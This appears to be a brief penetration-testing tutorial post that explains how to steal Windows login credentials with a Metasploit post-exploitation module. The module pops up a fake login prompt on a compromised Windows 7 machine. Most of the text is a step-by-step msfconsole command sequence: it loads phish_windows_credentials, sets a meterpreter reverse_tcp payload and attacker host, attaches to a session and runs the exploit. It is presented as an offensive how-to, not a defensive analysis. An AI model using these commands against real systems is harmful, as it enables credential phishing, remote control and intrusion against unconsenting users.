Kali Linux, Penetration Testing

Hack Remote Windows Password using Phishing Login Prompt Exploit

This module is able to perform a phishing attack on the target by popping up a loginprompt. When the user fills credentials in the loginprompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. Tested on Windows 7.

Exploit Targets

Windows 7


Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use post/windows/gather/phish_windows_credentials

msf exploit (phish_windows_credentials)>set payload windows/meterpreter/reverse_tcp

msf exploit (phish_windows_credentials)>set lhost (IP of Local Host)

msf exploit (phish_windows_credentials)>set session 1

msf exploit (phish_windows_credentials)>exploit